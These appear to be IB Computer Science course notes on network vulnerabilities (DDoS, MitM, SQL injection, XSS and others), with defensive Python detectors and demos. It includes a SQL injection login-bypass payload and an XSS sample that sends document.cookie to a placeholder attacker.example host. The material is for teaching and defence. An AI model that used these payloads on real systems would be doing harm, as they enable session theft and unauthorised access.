A2.4.2 Describe common network vulnerabilities. (HL only)
• Distributed denial of service (DDoS), insecure network protocols, malware, man-in-the-middle (MitM) attacks, phishing attacks, SQL injection, cross-site scripting (XSS), unpatched software, weak authentication, zero-day exploits
Big Idea
Computer networks interconnect systems to share resources and information, but every interface, protocol and service introduces potential weaknesses that attackers can exploit. Common network vulnerabilities arise when adversaries manipulate traffic flows, exploit flaws in software or protocols, or deceive users into divulging credentials. Understanding these vulnerabilities—how they operate and why they succeed—is essential for designing robust defenses.
1. Distributed Denial of Service (DDoS)
Description:
A DDoS attack floods a target (server, network link or application) with traffic from many sources at once (a botnet, or third-party servers answering spoofed requests), overwhelming its capacity so that legitimate requests are dropped or delayed. Because the traffic is distributed, blocking any single source address does little.
Mechanism:
- Botnets: Compromised hosts under attacker control send synchronized floods, e.g. HTTP GET requests at the application layer, or TCP SYN packets (SYN floods) that open connections the attacker never completes, filling the server's connection table.
- Reflection/Amplification: Attackers send small queries with a spoofed source IP (the victim's) to open servers (e.g. DNS resolvers, NTP servers), which reply with much larger responses directed at the victim. The ratio of response size to query size is the amplification factor; UDP services are the usual reflectors because no handshake verifies the source address.
Impact:
- Resource exhaustion (CPU, memory, bandwidth, connection state).
- Service unavailability for legitimate users.
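The two mechanisms above leave different traces in flow data, and a worked detector makes the difference concrete. The following is an added example, not code from the original notes: the flow records are constructed inline (RFC 5737 documentation addresses), and the thresholds (100 half-open connections from 50 distinct sources in one second) are illustrative assumptions, not published detection rules.

```python
from collections import defaultdict

# Constructed flow records (example data, not captured traffic):
# (time_s, proto, src, sport, dst, dport, tcp_flags, bytes)
# tcp_flags: "S" = SYN only, "SA" = SYN-ACK, "A" = ACK, "" = not TCP.
def build_sample_flows():
    flows = []
    # Two normal three-way handshakes to the web server 192.0.2.10.
    for i, client in enumerate(("198.51.100.20", "198.51.100.21")):
        port = 50000 + i
        flows.append((0.10 + i / 100, "tcp", client, port, "192.0.2.10", 443, "S", 60))
        flows.append((0.10 + i / 100, "tcp", "192.0.2.10", 443, client, port, "SA", 60))
        flows.append((0.20 + i / 100, "tcp", client, port, "192.0.2.10", 443, "A", 52))
    # SYN flood: 300 SYNs within 0.3 s from spoofed sources that never complete.
    for i in range(300):
        spoofed = f"203.0.113.{i % 250 + 1}"
        flows.append((0.5 + i / 1000, "tcp", spoofed, 1024 + i, "192.0.2.10", 443, "S", 60))
    # DNS reflection: a 64-byte query carrying the victim's spoofed address,
    # answered by a 3200-byte response that lands on the victim.
    flows.append((0.3, "udp", "192.0.2.10", 40000, "198.51.100.53", 53, "", 64))
    flows.append((0.3, "udp", "198.51.100.53", 53, "192.0.2.10", 40000, "", 3200))
    return flows


def half_open_per_destination(flows, window_s=1.0):
    """Per destination: SYNs within `window_s` of the first packet that were
    never followed by the client's final ACK, plus the number of distinct
    sources. Many half-open handshakes from many sources is a SYN flood."""
    t0 = min(f[0] for f in flows)
    pending = {}  # (src, sport, dst, dport) while the handshake is incomplete
    for ts, proto, src, sport, dst, dport, flags, _ in sorted(flows):
        if proto != "tcp" or ts - t0 > window_s:
            continue
        key = (src, sport, dst, dport)
        if flags == "S":
            pending[key] = True
        elif flags == "A" and key in pending:
            del pending[key]
    stats = defaultdict(lambda: {"half_open": 0, "sources": set()})
    for src, _, dst, _ in pending:
        stats[dst]["half_open"] += 1
        stats[dst]["sources"].add(src)
    return {dst: (v["half_open"], len(v["sources"])) for dst, v in stats.items()}


def flag_syn_floods(flows, min_half_open=100, min_sources=50):
    """Illustrative thresholds (assumed, not a standard): tune per network."""
    return {dst: s for dst, s in half_open_per_destination(flows).items()
            if s[0] >= min_half_open and s[1] >= min_sources}


def amplification_factors(flows):
    """For each (reflector, client) pair: bytes the DNS/NTP reflector sent to
    the client divided by bytes it received from that client. A large ratio
    toward one address means small spoofed queries are being turned into
    large responses aimed at a victim."""
    to_reflector = defaultdict(int)
    from_reflector = defaultdict(int)
    for _, proto, src, sport, dst, dport, _, size in flows:
        if proto != "udp":
            continue
        if dport in (53, 123):          # query to a DNS/NTP server
            to_reflector[(dst, src)] += size
        if sport in (53, 123):          # response from a DNS/NTP server
            from_reflector[(src, dst)] += size
    return {pair: from_reflector[pair] / to_reflector[pair]
            for pair in from_reflector if to_reflector.get(pair)}


if __name__ == "__main__":
    sample = build_sample_flows()
    print(flag_syn_floods(sample))        # {'192.0.2.10': (300, 250)}
    print(amplification_factors(sample))  # {('198.51.100.53', '192.0.2.10'): 50.0}
```

The SYN-flood heuristic keys on state that never completes; a legitimate burst of real clients completes its handshakes and does not trip it. The amplification check is only meaningful from a vantage point that sees both the spoofed query and the reflector's response (for example at the reflector's own network edge), which is why the real fix for reflection is source-address validation (BCP 38) at the networks that originate spoofed packets.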
2. Insecure Network Protocols
Description:
Protocols lacking encryption or authentication allow eavesdropping, tampering or session hijacking.
Examples:
- Telnet, FTP, HTTP (clear-text): Credentials and payloads can be read or modified by anyone on the path between client and server.
- SNMPv1/v2c: Community strings, which act as the passwords for reading or changing device configuration, are sent unencrypted.
Consequences:
- Credential interception.
- Injection of malicious commands or data.
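What "credential interception" means in practice is that an observer on the path needs no more than pattern matching to recover logins from these protocols. The following is an added example, not code from the original notes: the session transcript is constructed inline to look like the application-layer bytes of an FTP login and an HTTP request carrying Basic authentication, which a sniffer or a man-in-the-middle would see verbatim.

```python
import base64
import re

# Constructed transcript of cleartext sessions as seen on the wire
# (example data, not a real capture). Over TLS or SSH the same exchange
# would be ciphertext and nothing below would work.
SAMPLE_STREAM = """\
220 ftp.example.test FTP server ready
USER alice
331 Password required for alice
PASS s3cret-ftp
230 User alice logged in
GET /admin HTTP/1.1
Host: intranet.example.test
Authorization: Basic Ym9iOmh1bnRlcjI=
"""


def extract_cleartext_credentials(stream):
    """Return (protocol, username, password) triples recoverable from a
    cleartext stream: FTP USER/PASS pairs and HTTP Basic headers, which are
    only base64-encoded (an encoding, not encryption)."""
    found = []
    pending_user = None
    for line in stream.splitlines():
        m = re.match(r"^USER (\S+)$", line)
        if m:
            pending_user = m.group(1)
            continue
        m = re.match(r"^PASS (\S+)$", line)
        if m and pending_user is not None:
            found.append(("ftp", pending_user, m.group(1)))
            pending_user = None
            continue
        m = re.match(r"^Authorization: Basic (\S+)$", line, re.IGNORECASE)
        if m:
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # malformed header; not a usable credential
            if ":" in decoded:
                user, password = decoded.split(":", 1)
                found.append(("http-basic", user, password))
    return found


if __name__ == "__main__":
    for proto, user, password in extract_cleartext_credentials(SAMPLE_STREAM):
        print(proto, user, password)
```

The same observation applies to SNMPv1/v2c: the community string travels in the packet in the clear, it is simply BER-encoded rather than line-oriented. The mitigation is protocol replacement (SFTP/FTPS, SSH, HTTPS, SNMPv3 with authentication and privacy), not stronger passwords.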
3. Malware
Description:
Malicious software—viruses, worms, ransomware, trojans—that infiltrates hosts to disrupt operations, exfiltrate data or provide remote control.
Network-centric Vectors:
- Worm propagation: Self-replicating code scanning network subnets (e.g., via SMB or remote-execution flaws).
- Ransomware dropper downloads: Malicious payloads fetched over HTTP/HTTPS after initial compromise.
Implications:
- Lateral movement across hosts and VLANs.
- Botnet creation for further attacks.
4. Man-in-the-Middle (MitM) Attacks
Description:
An attacker interposes between two communicating parties to intercept, modify or relay messages without detection.
Techniques:
- ARP spoofing: Sending forged ARP replies so that victims' ARP caches map the gateway's IP address to the attacker's MAC address (and the gateway's cache maps the victim's IP to it), diverting LAN traffic through the attacker's host. (This poisons hosts' ARP caches, not the switch's MAC table; flooding the switch's MAC table is a different attack.)
- DNS spoofing: Forging DNS responses, or poisoning a resolver's cache, so clients connect to attacker-controlled servers while believing they reached the real name.
- TLS stripping: Intercepting a victim's initial plain-HTTP request and rewriting the server's HTTPS redirects and links to HTTP, so the session stays in cleartext and credentials can be captured; HSTS exists to close this gap.
Risks:
- Credential theft, data manipulation, injection of malicious payloads.
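ARP spoofing leaves a visible footprint on the victim: the gateway's entry in the local ARP cache changes to a MAC address that another host on the segment already owns. The following is an added example, not code from the original notes: it parses two constructed snapshots in the format of Linux `ip neigh show` output (the addresses and MACs are made up) and reports exactly those two symptoms.

```python
import re

# Constructed `ip neigh show` output for two snapshots of one host's ARP cache
# (example data, not taken from a real machine). In the second snapshot the
# gateway 192.168.1.1 suddenly resolves to the MAC that 192.168.1.50 owns.
NEIGH_BEFORE = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""
NEIGH_AFTER = """\
192.168.1.1 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:20 STALE
192.168.1.50 dev eth0 lladdr 00:11:22:33:44:50 REACHABLE
"""

NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17}) (\w+)$")


def parse_neigh(text):
    """Map IP -> MAC from `ip neigh show` lines. Entries without an lladdr
    (FAILED / INCOMPLETE) carry no mapping and are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(3).lower()
    return table


def detect_arp_spoofing(before, after, gateway):
    """Two ARP-poisoning symptoms: an IP whose MAC changed between snapshots,
    and one MAC answering for the gateway and for another host at once."""
    alerts = []
    old, new = parse_neigh(before), parse_neigh(after)
    for ip, mac in new.items():
        if ip in old and old[ip] != mac:
            alerts.append(f"{ip} changed from {old[ip]} to {mac}")
    by_mac = {}
    for ip, mac in new.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and gateway in ips:
            others = ", ".join(ip for ip in ips if ip != gateway)
            alerts.append(f"{mac} claims the gateway {gateway} and {others}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(NEIGH_BEFORE, NEIGH_AFTER, "192.168.1.1"):
        print(alert)
```

A MAC change on its own is not proof: a replaced router or a first-hop redundancy failover also changes the gateway's MAC. The second symptom, one MAC claiming the gateway plus another live host, is the stronger signal. Host-side monitoring like this is a detective control; the preventive ones are static ARP entries for the gateway and Dynamic ARP Inspection on the switches.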
5. Phishing Attacks
Description:
Deceptive communications (email, SMS, web) that trick users into revealing credentials or executing malicious links and attachments.
Network Angle:
- Spear-phishing with malicious hyperlinks: Users are led to fake login pages that are served over HTTPS (valid certificate, padlock shown) but controlled by attackers, so transport encryption offers no protection against the credential theft.
- Malicious payload delivery: Attachments download malware once opened.
Outcome:
- Credential compromise, network foothold, insider-level access.
6. SQL Injection
Description:
Attackers inject malicious SQL statements into user inputs that are concatenated into database queries, enabling unauthorized data access or manipulation.
Example:
With the username field set to ' OR 1=1; -- the concatenated query becomes:
SELECT * FROM users WHERE username = '' OR 1=1; --' AND password = '…';
The injected quote closes the string early, OR 1=1 makes the WHERE clause true for every row, and -- comments out the password check, so the query returns all users and the application typically logs the attacker in as the first one.
Impact:
- Data leakage, unauthorized modifications, complete database compromise.
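The difference between the vulnerable and the hardened query is easiest to see side by side against a real database engine. The following is an added example, not code from the original notes: it uses Python's sqlite3 module with an in-memory table constructed inline. The page's payload is used without its trailing semicolon because sqlite3's execute() accepts a single statement; the -- comment still removes the password check.

```python
import sqlite3


def make_db():
    """In-memory demo table (constructed data). Passwords are stored in
    plaintext only to keep the injection visible; real systems store
    salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct-horse"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the user's input becomes part of the SQL syntax."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the statement, so
    quotes and comment markers in the input are data, never syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# The page's payload minus the ';' (sqlite3.execute() takes one statement).
PAYLOAD = "' OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    # WHERE is always true and the password check is commented out: logs in as alice.
    print(login_vulnerable(db, PAYLOAD, "anything"))  # alice
    # No account is literally named "' OR 1=1 --": login fails.
    print(login_safe(db, PAYLOAD, "anything"))        # None
```

Parameterised queries (prepared statements) are the fix; input filtering alone is not, because the set of dangerous characters depends on the database and the query context.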
7. Cross-Site Scripting (XSS)
Description:
Injection of client-side scripts into web pages viewed by other users, enabling cookie theft, session hijacking or content spoofing.
Variants:
- Stored XSS: Malicious script saved on server (e.g., in a comment field) and served to all visitors.
- Reflected XSS: Payload embedded in a URL and reflected in the response.
Consequences:
- Account takeover, unauthorized actions under the victim's identity.
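Both variants come down to the same root cause, user-controlled text concatenated into HTML without output encoding, and the same fix. The following is an added example, not code from the original notes: the stored comments and the search term are constructed inline, and the "attacker" domain is a placeholder.

```python
import html

# Constructed forum comments as a server would have stored them (example
# data). The second entry is the attacker's submission.
STORED_COMMENTS = [
    ("alice", "Great write-up, thanks!"),
    ("mallory", "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
]


def render_comments_unsafe(comments):
    """Stored XSS: content is concatenated into the page unescaped, so every
    later visitor's browser runs mallory's script with their own cookies."""
    items = "".join(f"<li><b>{user}</b>: {text}</li>" for user, text in comments)
    return f"<ul>{items}</ul>"


def render_comments_safe(comments):
    """Same page with output encoding: html.escape turns <, >, &, ' and " into
    entities, so the payload is displayed as text instead of executed."""
    items = "".join(
        f"<li><b>{html.escape(user)}</b>: {html.escape(text)}</li>"
        for user, text in comments)
    return f"<ul>{items}</ul>"


def render_search_unsafe(query):
    """Reflected XSS: a parameter from the URL is echoed straight into the
    response, so a crafted link carries the payload to the victim."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query):
    return f"<p>Results for: {html.escape(query)}</p>"


if __name__ == "__main__":
    print(render_comments_unsafe(STORED_COMMENTS))
    print(render_comments_safe(STORED_COMMENTS))
    print(render_search_safe("<img src=x onerror=alert(1)>"))
```

html.escape is the right encoder for element content and quoted attribute values; text placed inside a script block, a URL or a CSS value needs the encoding for that context instead. A Content Security Policy that forbids inline scripts limits the damage when an encoding is missed.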
8. Unpatched Software
Description:
Outdated operating systems, firmware or applications contain known flaws that attackers can exploit using publicly available exploit code.
Example:
- EternalBlue (MS17-010): An SMBv1 flaw in unpatched Windows machines, exploited by the WannaCry and NotPetya outbreaks in 2017 even though Microsoft had published the patch months earlier.
Result:
- Rapid worm propagation, full system compromise.
9. Weak Authentication
Description:
Use of easily guessed, reused or default credentials, and absence of multi-factor authentication (MFA), increases the success rate of brute-force or credential-stuffing attacks.
Scenarios:
- Default admin/password on routers.
- Password spraying against corporate VPN portals.
Effect:
- Unauthorized network access, privilege escalation.
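Password spraying is designed to stay under per-account lockout, so it is invisible if you only count failures per user; counting per source address exposes it. The following is an added example, not code from the original notes: the log lines are constructed in a simple key=value layout (real VPN or SSO logs differ in format but carry the same fields), and the thresholds are illustrative assumptions.

```python
import re
from collections import defaultdict

# Constructed authentication log (example data). 203.0.113.7 tries one
# password against many accounts; 198.51.100.4 hammers one account;
# 192.0.2.10 is a real user who mistyped once.
SAMPLE_AUTH_LOG = """\
2024-05-01T09:00:01Z vpn-portal auth_fail user=alice src=203.0.113.7
2024-05-01T09:00:03Z vpn-portal auth_fail user=bob src=203.0.113.7
2024-05-01T09:00:05Z vpn-portal auth_fail user=carol src=203.0.113.7
2024-05-01T09:00:07Z vpn-portal auth_fail user=dave src=203.0.113.7
2024-05-01T09:00:09Z vpn-portal auth_fail user=erin src=203.0.113.7
2024-05-01T09:00:11Z vpn-portal auth_fail user=frank src=203.0.113.7
2024-05-01T09:00:12Z vpn-portal auth_fail user=bob src=198.51.100.4
2024-05-01T09:00:13Z vpn-portal auth_fail user=bob src=198.51.100.4
2024-05-01T09:00:14Z vpn-portal auth_fail user=bob src=198.51.100.4
2024-05-01T09:00:15Z vpn-portal auth_fail user=bob src=198.51.100.4
2024-05-01T09:00:16Z vpn-portal auth_fail user=bob src=198.51.100.4
2024-05-01T09:00:20Z vpn-portal auth_fail user=alice src=192.0.2.10
2024-05-01T09:00:25Z vpn-portal auth_ok user=alice src=192.0.2.10
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (auth_fail|auth_ok) user=(\S+) src=(\S+)$")


def failures_by_source(log_text):
    """Return {src: {user: failure_count}} built from auth_fail events."""
    table = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(3) == "auth_fail":
            table[m.group(5)][m.group(4)] += 1
    return table


def classify_sources(log_text, spray_users=5, brute_attempts=5):
    """Password spraying: one source, many distinct users, at most a couple
    of tries each. Brute force: one source, one account, many tries.
    Thresholds are assumed for the example; tune them to the real portal."""
    verdicts = {}
    for src, users in failures_by_source(log_text).items():
        if len(users) >= spray_users and max(users.values()) <= 2:
            verdicts[src] = "password-spraying"
        elif max(users.values()) >= brute_attempts:
            verdicts[src] = "brute-force"
    return verdicts


if __name__ == "__main__":
    print(classify_sources(SAMPLE_AUTH_LOG))
    # {'203.0.113.7': 'password-spraying', '198.51.100.4': 'brute-force'}
```

Attackers spread spraying across many source addresses and long time windows precisely to defeat this kind of counting, so detection is the backstop; the primary controls are MFA, rate limiting per source, and eliminating default and reused passwords.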
10. Zero-Day Exploits
Description:
Attacks leveraging vulnerabilities for which no vendor patch yet exists (the vendor has had "zero days" to fix them), usually because the flaw is unknown to the vendor until the attack is discovered.
Characteristics:
- High impact: no patch and no detection signature exists when the exploit is first used.
- Stealthy deployment via targeted delivery (e.g., spear-phishing).
Threat:
- Network perimeter and endpoint defenses offer little protection until signatures or patches are developed.
Conclusion
Networks face a broad spectrum of vulnerabilities—from volumetric floods and protocol design weaknesses to sophisticated injection and social-engineering attacks. Effective defense requires layered controls: secure protocols (TLS, SSH), rigorous patch management, strong authentication, intrusion-prevention systems, and user education. By recognizing how each vulnerability operates and interacts with network components, engineers can architect resilient infrastructures that anticipate and mitigate both known and emerging threats.